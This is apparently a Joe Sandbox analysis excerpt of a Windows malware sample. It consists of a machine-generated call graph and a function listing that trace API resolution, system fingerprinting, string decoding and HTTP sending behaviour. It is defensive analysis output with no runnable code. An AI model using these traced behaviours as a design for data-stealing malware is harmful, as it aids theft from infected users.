26627 2b4a60 2 API calls 26626->26627 26628 2b3e13 26627->26628 26629 2b4a60 2 API calls 26628->26629 26630 2b3e29 26629->26630 26631 2b4a60 2 API calls 26630->26631 26632 2b3e3f 26631->26632 26633 2b4a60 2 API calls 26632->26633 26634 2b3e55 26633->26634 26635 2b4a60 2 API calls 26634->26635 26636 2b3e6e 26635->26636 26637 2b4a60 2 API calls 26636->26637 26638 2b3e84 26637->26638 26639 2b4a60 2 API calls 26638->26639 26640 2b3e9a 26639->26640 26641 2b4a60 2 API calls 26640->26641 26642 2b3eb0 26641->26642 26643 2b4a60 2 API calls 26642->26643 26644 2b3ec6 26643->26644 26645 2b4a60 2 API calls 26644->26645 26646 2b3edc 26645->26646 26647 2b4a60 2 API calls 26646->26647 26648 2b3ef5 26647->26648 26649 2b4a60 2 API calls 26648->26649 26650 2b3f0b 26649->26650 26651 2b4a60 2 API calls 26650->26651 26652 2b3f21 26651->26652 26653 2b4a60 2 API calls 26652->26653 26654 2b3f37 26653->26654 26655 2b4a60 2 API calls 26654->26655 26656 2b3f4d 26655->26656 26657 2b4a60 2 API calls 26656->26657 26658 2b3f63 26657->26658 26659 2b4a60 2 API calls 26658->26659 26660 2b3f7c 26659->26660 26661 2b4a60 2 API calls 26660->26661 26662 2b3f92 26661->26662 26663 2b4a60 2 API calls 26662->26663 26664 2b3fa8 26663->26664 26665 2b4a60 2 API calls 26664->26665 26666 2b3fbe 26665->26666 26667 2b4a60 2 API calls 26666->26667 26668 2b3fd4 26667->26668 26669 2b4a60 2 API calls 26668->26669 26670 2b3fea 26669->26670 26671 2b4a60 2 API calls 26670->26671 26672 2b4003 26671->26672 26673 2b4a60 2 API calls 26672->26673 26674 2b4019 26673->26674 26675 2b4a60 2 API calls 26674->26675 26676 2b402f 26675->26676 26677 2b4a60 2 API calls 26676->26677 26678 2b4045 26677->26678 26679 2b4a60 2 API calls 26678->26679 26680 2b405b 26679->26680 26681 2b4a60 2 API calls 26680->26681 26682 2b4071 26681->26682 26683 2b4a60 2 API calls 26682->26683 26684 2b408a 26683->26684 26685 2b4a60 2 API calls 26684->26685 26686 2b40a0 26685->26686 26687 2b4a60 2 API calls 26686->26687 26688 2b40b6 26687->26688 26689 2b4a60 2 API calls 26688->26689 26690 2b40cc 26689->26690 26691 2b4a60 2 API calls 26690->26691 26692 2b40e2 26691->26692 26693 2b4a60 2 API calls 26692->26693 26694 2b40f8 26693->26694 26695 2b4a60 2 API calls 26694->26695 26696 2b4111 26695->26696 26697 2b4a60 2 API calls 26696->26697 26698 2b4127 26697->26698 26699 2b4a60 2 API calls 26698->26699 26700 2b413d 26699->26700 26701 2b4a60 2 API calls 26700->26701 26702 2b4153 26701->26702 26703 2b4a60 2 API calls 26702->26703 26704 2b4169 26703->26704 26705 2b4a60 2 API calls 26704->26705 26706 2b417f 26705->26706 26707 2b4a60 2 API calls 26706->26707 26708 2b4198 26707->26708 26709 2b4a60 2 API calls 26708->26709 26710 2b41ae 26709->26710 26711 2b4a60 2 API calls 26710->26711 26712 2b41c4 26711->26712 26713 2b4a60 2 API calls 26712->26713 26714 2b41da 26713->26714 26715 2b4a60 2 API calls 26714->26715 26716 2b41f0 26715->26716 26717 2b4a60 2 API calls 26716->26717 26718 2b4206 26717->26718 26719 2b4a60 2 API calls 26718->26719 26720 2b421f 26719->26720 26721 2b4a60 2 API calls 26720->26721 26722 2b4235 26721->26722 26723 2b4a60 2 API calls 26722->26723 26724 2b424b 26723->26724 26725 2b4a60 2 API calls 26724->26725 26726 2b4261 26725->26726 26727 2b4a60 2 API calls 26726->26727 26728 2b4277 26727->26728 26729 2b4a60 2 API calls 26728->26729 26730 2b428d 26729->26730 26731 2b4a60 2 API calls 26730->26731 26732 2b42a6 26731->26732 26733 2b4a60 2 API calls 26732->26733 26734 2b42bc 26733->26734 26735 2b4a60 2 API calls 26734->26735 26736 2b42d2 26735->26736 26737 2b4a60 2 API calls 26736->26737 26738 2b42e8 26737->26738 26739 2b4a60 2 API calls 26738->26739 26740 2b42fe 26739->26740 26741 2b4a60 2 API calls 26740->26741 26742 2b4314 26741->26742 26743 2b4a60 2 API calls 26742->26743 26744 2b432d 26743->26744 26745 2b4a60 2 API calls 26744->26745 26746 2b4343 26745->26746 26747 2b4a60 2 API calls 26746->26747 26748 2b4359 26747->26748 26749 2b4a60 2 API calls 26748->26749 26750 2b436f 26749->26750 26751 2b4a60 2 API calls 26750->26751 26752 2b4385 26751->26752 26753 2b4a60 2 API calls 26752->26753 26754 2b439b 26753->26754 26755 2b4a60 2 API calls 26754->26755 26756 2b43b4 26755->26756 26757 2b4a60 2 API calls 26756->26757 26758 2b43ca 26757->26758 26759 2b4a60 2 API calls 26758->26759 26760 2b43e0 26759->26760 26761 2b4a60 2 API calls 26760->26761 26762 2b43f6 26761->26762 26763 2b4a60 2 API calls 26762->26763 26764 2b440c 26763->26764 26765 2b4a60 2 API calls 26764->26765 26766 2b4422 26765->26766 26767 2b4a60 2 API calls 26766->26767 26768 2b443b 26767->26768 26769 2b4a60 2 API calls 26768->26769 26770 2b4451 26769->26770 26771 2b4a60 2 API calls 26770->26771 26772 2b4467 26771->26772 26773 2b4a60 2 API calls 26772->26773 26774 2b447d 26773->26774 26775 2b4a60 2 API calls 26774->26775 26776 2b4493 26775->26776 26777 2b4a60 2 API calls 26776->26777 26778 2b44a9 26777->26778 26779 2b4a60 2 API calls 26778->26779 26780 2b44c2 26779->26780 26781 2b4a60 2 API calls 26780->26781 26782 2b44d8 26781->26782 26783 2b4a60 2 API calls 26782->26783 26784 2b44ee 26783->26784 26785 2b4a60 2 API calls 26784->26785 26786 2b4504 26785->26786 26787 2b4a60 2 API calls 26786->26787 26788 2b451a 26787->26788 26789 2b4a60 2 API calls 26788->26789 26790 2b4530 26789->26790 26791 2b4a60 2 API calls 26790->26791 26792 2b4549 26791->26792 26793 2b4a60 2 API calls 26792->26793 26794 2b455f 26793->26794 26795 2b4a60 2 API calls 26794->26795 26796 2b4575 26795->26796 26797 2b4a60 2 API calls 26796->26797 26798 2b458b 26797->26798 26799 2b4a60 2 API calls 26798->26799 26800 2b45a1 26799->26800 26801 2b4a60 2 API calls 26800->26801 26802 2b45b7 26801->26802 26803 2b4a60 2 API calls 26802->26803 26804 2b45d0 26803->26804 26805 2b4a60 2 API calls 26804->26805 26806 2b45e6 26805->26806 26807 2b4a60 2 API calls 26806->26807 26808 2b45fc 26807->26808 26809 2b4a60 2 API calls 26808->26809 26810 2b4612 26809->26810 26811 2b4a60 2 API calls 26810->26811 26812 2b4628 26811->26812 26813 2b4a60 2 API calls 26812->26813 26814 2b463e 26813->26814 26815 2b4a60 2 API calls 26814->26815 26816 2b4657 26815->26816 26817 2b4a60 2 API calls 26816->26817 26818 2b466d 26817->26818 26819 2b4a60 2 API calls 26818->26819 26820 2b4683 26819->26820 26821 2b4a60 2 API calls 26820->26821 26822 2b4699 26821->26822 26823 2b4a60 2 API calls 26822->26823 26824 2b46af 26823->26824 26825 2b4a60 2 API calls 26824->26825 26826 2b46c5 26825->26826 26827 2b4a60 2 API calls 26826->26827 26828 2b46de 26827->26828 26829 2b4a60 2 API calls 26828->26829 26830 2b46f4 26829->26830 26831 2b4a60 2 API calls 26830->26831 26832 2b470a 26831->26832 26833 2b4a60 2 API calls 26832->26833 26834 2b4720 26833->26834 26835 2b4a60 2 API calls 26834->26835 26836 2b4736 26835->26836 26837 2b4a60 2 API calls 26836->26837 26838 2b474c 26837->26838 26839 2b4a60 2 API calls 26838->26839 26840 2b4765 26839->26840 26841 2b4a60 2 API calls 26840->26841 26842 2b477b 26841->26842 26843 2b4a60 2 API calls 26842->26843 26844 2b4791 26843->26844 26845 2b4a60 2 API calls 26844->26845 26846 2b47a7 26845->26846 26847 2b4a60 2 API calls 26846->26847 26848 2b47bd 26847->26848 26849 2b4a60 2 API calls 26848->26849 26850 2b47d3 26849->26850 26851 2b4a60 2 API calls 26850->26851 26852 2b47ec 26851->26852 26853 2b4a60 2 API calls 26852->26853 26854 2b4802 26853->26854 26855 2b4a60 2 API calls 26854->26855 26856 2b4818 26855->26856 26857 2b4a60 2 API calls 26856->26857 26858 2b482e 26857->26858 26859 2b4a60 2 API calls 26858->26859 26860 2b4844 26859->26860 26861 2b4a60 2 API calls 26860->26861 26862 2b485a 26861->26862 26863 2b4a60 2 API calls 26862->26863 26864 2b4873 26863->26864 26865 2b4a60 2 API calls 26864->26865 26866 2b4889 26865->26866 26867 2b4a60 2 API calls 26866->26867 26868 2b489f 26867->26868 26869 2b4a60 2 API calls 26868->26869 26870 2b48b5 26869->26870 26871 2b4a60 2 API calls 26870->26871 26872 2b48cb 26871->26872 26873 2b4a60 2 API calls 26872->26873 26874 2b48e1 26873->26874 26875 2b4a60 2 API calls 26874->26875 26876 2b48fa 26875->26876 26877 2b4a60 2 API calls 26876->26877 26878 2b4910 26877->26878 26879 2b4a60 2 API calls 26878->26879 26880 2b4926 26879->26880 26881 2b4a60 2 API calls 26880->26881 26882 2b493c 26881->26882 26883 2b4a60 2 API calls 26882->26883 26884 2b4952 26883->26884 26885 2b4a60 2 API calls 26884->26885 26886 2b4968 26885->26886 26887 2b4a60 2 API calls 26886->26887 26888 2b4981 26887->26888 26889 2b4a60 2 API calls 26888->26889 26890 2b4997 26889->26890 26891 2b4a60 2 API calls 26890->26891 26892 2b49ad 26891->26892 26893 2b4a60 2 API calls 26892->26893 26894 2b49c3 26893->26894 26895 2b4a60 2 API calls 26894->26895 26896 2b49d9 26895->26896 26897 2b4a60 2 API calls 26896->26897 26898 2b49ef 26897->26898 26899 2b4a60 2 API calls 26898->26899 26900 2b4a08 26899->26900 26901 2b4a60 2 API calls 26900->26901 26902 2b4a1e 26901->26902 26903 2b4a60 2 API calls 26902->26903 26904 2b4a34 26903->26904 26905 2b4a60 2 API calls 26904->26905 26906 2b4a4a 26905->26906 26907 2d66e0 26906->26907 26908 2d66ed 43 API calls 26907->26908 26909 2d6afe 8 API calls 26907->26909 26908->26909 26910 2d6c08 26909->26910 26911 2d6b94 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26909->26911 26912 2d6c15 8 API calls 26910->26912 26913 2d6cd2 26910->26913 26911->26910 26912->26913 26914 2d6d4f 26913->26914 26915 2d6cdb GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26913->26915 26916 2d6d5c 6 API calls 26914->26916 26917 2d6de9 26914->26917 26915->26914 26916->26917 26918 2d6df6 12 API calls 26917->26918 26919 2d6f10 26917->26919 26918->26919 26920 2d6f8d 26919->26920 26921 2d6f19 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26919->26921 26922 2d6f96 GetProcAddress GetProcAddress 26920->26922 26923 2d6fc1 26920->26923 26921->26920 26922->26923 26924 2d6fca GetProcAddress GetProcAddress 26923->26924 26925 2d6ff5 26923->26925 26924->26925 26926 2d70ed 26925->26926 26927 2d7002 10 API calls 26925->26927 26928 2d70f6 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26926->26928 26929 2d7152 26926->26929 26927->26926 26928->26929 26930 2d716e 26929->26930 26931 2d715b GetProcAddress 26929->26931 26932 2d7177 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26930->26932 26933 2d051f 26930->26933 26931->26930 26932->26933 26934 2b1530 26933->26934 27243 2b1610 26934->27243 26936 2b153b 26937 2b1555 lstrcpy 26936->26937 26938 2b155d 26936->26938 26937->26938 26939 2b1577 lstrcpy 26938->26939 26940 2b157f 26938->26940 26939->26940 26941 2b1599 lstrcpy 26940->26941 26942 2b15a1 26940->26942 26941->26942 26943 2b1605 26942->26943 26944 2b15fd lstrcpy 26942->26944 26945 2cf1b0 lstrlen 26943->26945 26944->26943 26946 2cf1e4 26945->26946 26947 2cf1eb lstrcpy 26946->26947 26948 2cf1f7 lstrlen 26946->26948 26947->26948 26949 2cf208 26948->26949 26950 2cf20f lstrcpy 26949->26950 26951 2cf21b lstrlen 26949->26951 26950->26951 26952 2cf22c 26951->26952 26953 2cf233 lstrcpy 26952->26953 26954 2cf23f 26952->26954 26953->26954 26955 2cf258 lstrcpy 26954->26955 26956 2cf264 26954->26956 26955->26956 26957 2cf286 lstrcpy 26956->26957 26958 2cf292 26956->26958 26957->26958 26959 2cf2ba lstrcpy 26958->26959 26960 2cf2c6 26958->26960 26959->26960 26961 2cf2ea lstrcpy 26960->26961 27002 2cf300 26960->27002 26961->27002 26962 2cf30c lstrlen 26962->27002 26963 2cf4b9 lstrcpy 26963->27002 26964 2cf3a1 lstrcpy 26964->27002 26965 2cf3c5 lstrcpy 26965->27002 26966 2cf4e8 lstrcpy 27028 2cf4f0 26966->27028 26967 2cf479 lstrcpy 26967->27002 26968 2cf59c lstrcpy 26968->27028 26969 2cf70f StrCmpCA 26974 2cfe8e 26969->26974 26969->27002 26970 2cf616 StrCmpCA 26970->26969 26970->27028 26971 2cfa29 StrCmpCA 26981 2cfe2b 26971->26981 26971->27002 26972 2cf73e lstrlen 26972->27002 26973 2cfead lstrlen 26989 2cfec7 26973->26989 26974->26973 26976 2cfea5 lstrcpy 26974->26976 26975 2cfd4d StrCmpCA 26978 2cfd60 Sleep 26975->26978 26986 2cfd75 26975->26986 26976->26973 26977 2cfa58 lstrlen 26977->27002 26978->27002 26979 2cf64a lstrcpy 26979->27028 26980 2b1530 8 API calls 26980->27028 26982 2cfe4a lstrlen 26981->26982 26985 2cfe42 lstrcpy 26981->26985 26995 2cfe64 26982->26995 26983 2cee90 28 API calls 26983->27028 26984 2cf89e lstrcpy 26984->27002 26985->26982 26987 2cfd94 lstrlen 26986->26987 26991 2cfd8c lstrcpy 26986->26991 26997 2cfdae 26987->26997 26988 2cf76f lstrcpy 26988->27002 26990 2cfee7 lstrlen 26989->26990 26993 2cfedf lstrcpy 26989->26993 27004 2cff01 26990->27004 26991->26987 26992 2cfbb8 lstrcpy 26992->27002 26993->26990 26994 2cfa89 lstrcpy 26994->27002 26996 2cfdce lstrlen 26995->26996 26999 2cfe7c lstrcpy 26995->26999 27003 2cfde8 26996->27003 26997->26996 27008 2cfdc6 lstrcpy 26997->27008 26998 2cf791 lstrcpy 26998->27002 26999->26996 27001 2cf8cd lstrcpy 27001->27028 27002->26962 27002->26963 27002->26964 27002->26965 27002->26966 27002->26967 27002->26969 27002->26971 27002->26972 27002->26975 27002->26977 27002->26984 27002->26988 27002->26992 27002->26994 27002->26998 27002->27001 27007 2cfaab lstrcpy 27002->27007 27009 2b1530 8 API calls 27002->27009 27010 2cfbe7 lstrcpy 27002->27010 27013 2cee90 28 API calls 27002->27013 27018 2cf7e2 lstrcpy 27002->27018 27021 2cfafc lstrcpy 27002->27021 27002->27028 27014 2cfe08 27003->27014 27016 2cfe00 lstrcpy 27003->27016 27005 2cff21 27004->27005 27011 2cff19 lstrcpy 27004->27011 27012 2b1610 4 API calls 27005->27012 27006 2cf698 lstrcpy 27006->27028 27007->27002 27008->26996 27009->27002 27010->27028 27011->27005 27029 2cfe13 27012->27029 27013->27002 27017 2b1610 4 API calls 27014->27017 27015 2cefb0 35 API calls 27015->27028 27016->27014 27017->27029 27018->27002 27019 2cf924 lstrcpy 27019->27028 27020 2cf99e StrCmpCA 27020->26971 27020->27028 27021->27002 27022 2cfc3e lstrcpy 27022->27028 27023 2cfcb8 StrCmpCA 27023->26975 27023->27028 27024 2cf9cb lstrcpy 27024->27028 27025 2cfce9 lstrcpy 27025->27028 27026 2cfa19 lstrcpy 27026->27028 27027 2cfd3a lstrcpy 27027->27028 27028->26968 27028->26970 27028->26971 27028->26975 27028->26979 27028->26980 27028->26983 27028->27002 27028->27006 27028->27015 27028->27019 27028->27020 27028->27022 27028->27023 27028->27024 27028->27025 27028->27026 27028->27027 27029->26053 27031 2d278c GetVolumeInformationA 27030->27031 27032 2d2785 27030->27032 27033 2d27ec GetProcessHeap RtlAllocateHeap 27031->27033 27032->27031 27035 2d2826 wsprintfA 27033->27035 27036 2d2822 27033->27036 27035->27036 27253 2d71e0 27036->27253 27040 2b4c70 27039->27040 27041 2b4c85 27040->27041 27042 2b4c7d lstrcpy 27040->27042 27257 2b4bc0 27041->27257 27042->27041 27044 2b4c90 27045 2b4ccc lstrcpy 27044->27045 27046 2b4cd8 27044->27046 27045->27046 27047 2b4cff lstrcpy 27046->27047 27048 2b4d0b 27046->27048 27047->27048 27049 2b4d2f lstrcpy 27048->27049 27050 2b4d3b 27048->27050 27049->27050 27051 2b4d6d lstrcpy 27050->27051 27052 2b4d79 27050->27052 27051->27052 27053 2b4dac InternetOpenA StrCmpCA 27052->27053 27054 2b4da0 lstrcpy 27052->27054 27055 2b4de0 27053->27055 27054->27053 27056 2b54b8 InternetCloseHandle CryptStringToBinaryA 27055->27056 27261 2d3e70 27055->27261 27058 2b54e8 LocalAlloc 27056->27058 27074 2b55d8 27056->27074 27059 2b54ff CryptStringToBinaryA 27058->27059 27058->27074 27060 2b5529 lstrlen 27059->27060 27061 2b5517 LocalFree 27059->27061 27062 2b553d 27060->27062 27061->27074 27064 2b5563 lstrlen 27062->27064 27065 2b5557 lstrcpy 27062->27065 27063 2b4dfa 27066 2b4e23 lstrcpy lstrcat 27063->27066 27067 2b4e38 27063->27067 27069 2b557d 27064->27069 27065->27064 27066->27067 27068 2b4e5a lstrcpy 27067->27068 27070 2b4e62 27067->27070 27068->27070 27071 2b558f lstrcpy lstrcat 27069->27071 27072 2b55a2 27069->27072 27073 2b4e71 lstrlen 27070->27073 27071->27072 27075 2b55d1 27072->27075 27077 2b55c9 lstrcpy 27072->27077 27076 2b4e89 27073->27076 27074->26082 27075->27074 27078 2b4e95 lstrcpy lstrcat 27076->27078 27079 2b4eac 27076->27079 27077->27075 27078->27079 27080 2b4ed5 27079->27080 27081 2b4ecd lstrcpy 27079->27081 27082 2b4edc lstrlen 27080->27082 27081->27080 27083 2b4ef2 27082->27083 27084 2b4efe lstrcpy lstrcat 27083->27084 27085 2b4f15 27083->27085 27084->27085 27086 2b4f36 lstrcpy 27085->27086 27087 2b4f3e 27085->27087 27086->27087 27088 2b4f65 lstrcpy lstrcat 27087->27088 27089 2b4f7b 27087->27089 27088->27089 27090 2b4fa4 27089->27090 27091 2b4f9c lstrcpy 27089->27091 27092 2b4fab lstrlen 27090->27092 27091->27090 27093 2b4fc1 27092->27093 27094 2b4fcd lstrcpy lstrcat 27093->27094 27095 2b4fe4 27093->27095 27094->27095 27096 2b500d 27095->27096 27097 2b5005 lstrcpy 27095->27097 27098 2b5014 lstrlen 27096->27098 27097->27096 27099 2b502a 27098->27099 27100 2b5036 lstrcpy lstrcat 27099->27100 27101 2b504d 27099->27101 27100->27101 27102 2b5079 27101->27102 27103 2b5071 lstrcpy 27101->27103 27104 2b5080 lstrlen 27102->27104 27103->27102 27105 2b509b 27104->27105 27106 2b50ac lstrcpy lstrcat 27105->27106 27107 2b50bc 27105->27107 27106->27107 27108 2b50da lstrcpy lstrcat 27107->27108 27109 2b50ed 27107->27109 27108->27109 27110 2b510b lstrcpy 27109->27110 27111 2b5113 27109->27111 27110->27111 27112 2b5121 InternetConnectA 27111->27112 27112->27056 27113 2b5150 HttpOpenRequestA 27112->27113 27114 2b518b 27113->27114 27115 2b54b1 InternetCloseHandle 27113->27115 27268 2d7310 lstrlen 27114->27268 27115->27056 27119 2b51a4 27276 2d72c0 27119->27276 27122 2d7280 lstrcpy 27123 2b51c0 27122->27123 27124 2d7310 3 API calls 27123->27124 27125 2b51d5 27124->27125 27126 2d7280 lstrcpy 27125->27126 27127 2b51de 27126->27127 27128 2d7310 3 API calls 27127->27128 27129 2b51f4 27128->27129 27130 2d7280 lstrcpy 27129->27130 27131 2b51fd 27130->27131 27132 2d7310 3 API calls 27131->27132 27133 2b5213 27132->27133 27134 2d7280 lstrcpy 27133->27134 27135 2b521c 27134->27135 27136 2d7310 3 API calls 27135->27136 27137 2b5231 27136->27137 27138 2d7280 lstrcpy 27137->27138 27139 2b523a 27138->27139 27140 2d72c0 2 API calls 27139->27140 27141 2b524d 27140->27141 27142 2d7280 lstrcpy 27141->27142 27143 2b5256 27142->27143 27144 2d7310 3 API calls 27143->27144 27145 2b526b 27144->27145 27146 2d7280 lstrcpy 27145->27146 27147 2b5274 27146->27147 27148 2d7310 3 API calls 27147->27148 27149 2b5289 27148->27149 27150 2d7280 lstrcpy 27149->27150 27151 2b5292 27150->27151 27152 2d72c0 2 API calls 27151->27152 27153 2b52a5 27152->27153 27154 2d7280 lstrcpy 27153->27154 27155 2b52ae 27154->27155 27156 2d7310 3 API calls 27155->27156 27157 2b52c3 27156->27157 27158 2d7280 lstrcpy 27157->27158 27159 2b52cc 27158->27159 27160 2d7310 3 API calls 27159->27160 27161 2b52e2 27160->27161 27162 2d7280 lstrcpy 27161->27162 27163 2b52eb 27162->27163 27164 2d7310 3 API calls 27163->27164 27165 2b5301 27164->27165 27166 2d7280 lstrcpy 27165->27166 27167 2b530a 27166->27167 27168 2d7310 3 API calls 27167->27168 27169 2b531f 27168->27169 27170 2d7280 lstrcpy 27169->27170 27171 2b5328 27170->27171 27172 2d72c0 2 API calls 27171->27172 27173 2b533b 27172->27173 27174 2d7280 lstrcpy 27173->27174 27175 2b5344 27174->27175 27176 2b537c 27175->27176 27177 2b5370 lstrcpy 27175->27177 27178 2d72c0 2 API calls 27176->27178 27177->27176 27179 2b538a 27178->27179 27180 2d72c0 2 API calls 27179->27180 27181 2b5397 27180->27181 27182 2d7280 lstrcpy 27181->27182 27183 2b53a1 27182->27183 27184 2b53b1 lstrlen lstrlen HttpSendRequestA InternetReadFile 27183->27184 27185 2b549c InternetCloseHandle 27184->27185 27189 2b53f2 27184->27189 27187 2b54ae 27185->27187 27186 2b53fd lstrlen 27186->27189 27187->27115 27188 2b542e lstrcpy lstrcat 27188->27189 27189->27185 27189->27186 27189->27188 27190 2b5473 27189->27190 27191 2b546b lstrcpy 27189->27191 27192 2b547a InternetReadFile 27190->27192 27191->27190 27192->27185 27192->27189 27194 2c8cc6 ExitProcess 27193->27194 27209 2c8ccd 27193->27209 27195 2c8ee2 27195->26084 27196 2c8e6f StrCmpCA 27196->27209 27197 2c8e88 lstrlen 27197->27209 27198 2c8d84 StrCmpCA 27198->27209 27199 2c8da4 StrCmpCA 27199->27209 27200 2c8d06 lstrlen 27200->27209 27201 2c8dbd StrCmpCA 27201->27209 27202 2c8ddd StrCmpCA 27202->27209 27203 2c8dfd StrCmpCA 27203->27209 27204 2c8e1d StrCmpCA 27204->27209 27205 2c8e3d StrCmpCA 27205->27209 27206 2c8d5a lstrlen 27206->27209 27207 2c8e56 StrCmpCA 27207->27209 27208 2c8d30 lstrlen 27208->27209 27209->27195 27209->27196 27209->27197 27209->27198 27209->27199 27209->27200 27209->27201 27209->27202 27209->27203 27209->27204 27209->27205 27209->27206 27209->27207 27209->27208 27210 2c8ebb lstrcpy 27209->27210 27210->27209 27211->26090 27212->26092 27213->26098 27214->26100 27215->26106 27216->26108 27217->26114 27218->26118 27219->26124 27220->26126 27221->26130 27222->26144 27223->26148 27224->26147 27225->26143 27226->26147 27227->26163 27228->26150 27229->26153 27230->26154 27231->26160 27232->26165 27233->26167 27234->26174 27235->26181 27236->26201 27237->26205 27238->26204 27239->26199 27240->26204 27241->26214 27244 2b161f 27243->27244 27245 2b162b lstrcpy 27244->27245 27246 2b1633 27244->27246 27245->27246 27247 2b164d lstrcpy 27246->27247 27248 2b1655 27246->27248 27247->27248 27249 2b166f lstrcpy 27248->27249 27250 2b1677 27248->27250 27249->27250 27251 2b1699 27250->27251 27252 2b1691 lstrcpy 27250->27252 27251->26936 27252->27251 27254 2d71e6 27253->27254 27255 2d71fc lstrcpy 27254->27255 27256 2d2860 27254->27256 27255->27256 27256->26079 27258 2b4bd0 27257->27258 27258->27258 27259 2b4bd7 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI lstrlen InternetCrackUrlA 27258->27259 27260 2b4c41 27259->27260 27260->27044 27262 2d3e83 27261->27262 27263 2d3e9f lstrcpy 27262->27263 27264 2d3eab 27262->27264 27263->27264 27265 2d3ecd lstrcpy 27264->27265 27266 2d3ed5 GetSystemTime 27264->27266 27265->27266 27267 2d3ef3 27266->27267 27267->27063 27270 2d732d 27268->27270 27269 2b519b 27272 2d7280 27269->27272 27270->27269 27271 2d733d lstrcpy lstrcat 27270->27271 27271->27269 27273 2d728c 27272->27273 27274 2d72b4 27273->27274 27275 2d72ac lstrcpy 27273->27275 27274->27119 27275->27274 27278 2d72dc 27276->27278 27277 2b51b7 27277->27122 27278->27277 27279 2d72ed lstrcpy lstrcat 27278->27279 27279->27277 27309 2d31f0 GetSystemInfo wsprintfA 27289 2ce049 147 API calls 27338 2c8615 48 API calls 27331 2c8615 49 API calls 27300 2d3cc0 GetProcessHeap RtlAllocateHeap wsprintfA lstrcpy 27339 2d33c0 GetProcessHeap RtlAllocateHeap GlobalMemoryStatusEx wsprintfA 27306 2c3959 244 API calls 27310 2c01d9 126 API calls 27301 2d2cd0 GetUserDefaultLocaleName LocalAlloc CharToOemW 27290 2d2853 lstrcpy

                                  Executed Functions

                                  Function 002B4C50 Relevance: 111.1, APIs: 61, Strings: 2, Instructions: 807stringnetworkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002B4C7F
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002B4CD2
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002B4D05
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002B4D35
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002B4D73
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002B4DA6
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 002B4DB6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$InternetOpen
                                  • String ID: "$------
                                  • API String ID: 2041821634-2370822465
                                  • Opcode ID: b53443bcc8ed07b0e00f7229ac4b4136b3ce4325cc37999fe8cedfb7f16e64e1
                                  • Instruction ID: cf47ad0ecea7aeaf2435d52180f2dde9a14fe14525ea155e37487d1662c0f978
                                  • Opcode Fuzzy Hash: b53443bcc8ed07b0e00f7229ac4b4136b3ce4325cc37999fe8cedfb7f16e64e1
                                  • Instruction Fuzzy Hash: 0C529E319216169BDB21EFA4DC89BEEB7B9AF04380F144425F845EB252DB34EC56CF90
                                  Function 002D6390 Relevance: 58.0, APIs: 32, Strings: 1, Instructions: 218libraryloaderCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2125 2d6390-2d63bd GetPEB 2126 2d65c3-2d6623 LoadLibraryA * 5 2125->2126 2127 2d63c3-2d65be call 2d62f0 GetProcAddress * 20 2125->2127 2129 2d6638-2d663f 2126->2129 2130 2d6625-2d6633 GetProcAddress 2126->2130 2127->2126 2131 2d666c-2d6673 2129->2131 2132 2d6641-2d6667 GetProcAddress * 2 2129->2132 2130->2129 2134 2d6688-2d668f 2131->2134 2135 2d6675-2d6683 GetProcAddress 2131->2135 2132->2131 2136 2d66a4-2d66ab 2134->2136 2137 2d6691-2d669f GetProcAddress 2134->2137 2135->2134 2139 2d66ad-2d66d2 GetProcAddress * 2 2136->2139 2140 2d66d7-2d66da 2136->2140 2137->2136 2139->2140
                                  APIs
                                  • GetProcAddress.KERNEL32(74DD0000,011C2440), ref: 002D63E9
                                  • GetProcAddress.KERNEL32(74DD0000,011C24A0), ref: 002D6402
                                  • GetProcAddress.KERNEL32(74DD0000,011C2488), ref: 002D641A
                                  • GetProcAddress.KERNEL32(74DD0000,011C2380), ref: 002D6432
